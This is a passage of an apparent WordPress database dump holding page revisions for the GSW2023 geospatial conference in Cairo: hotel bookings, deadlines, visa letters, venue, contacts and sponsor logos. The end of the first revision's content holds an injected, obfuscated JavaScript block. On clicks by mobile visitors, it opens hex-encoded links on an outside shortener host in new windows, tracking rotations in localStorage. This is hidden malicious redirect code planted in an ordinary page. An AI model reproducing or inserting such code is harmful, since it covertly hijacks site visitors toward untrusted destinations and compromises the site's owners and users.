link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:30:32','2023-08-16 00:30:32','',3066,'https://gsw2023.com/?p=5260',0,'revision','',0),
(5261,1,'2023-08-16 00:31:58','2023-08-16 00:31:58','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row 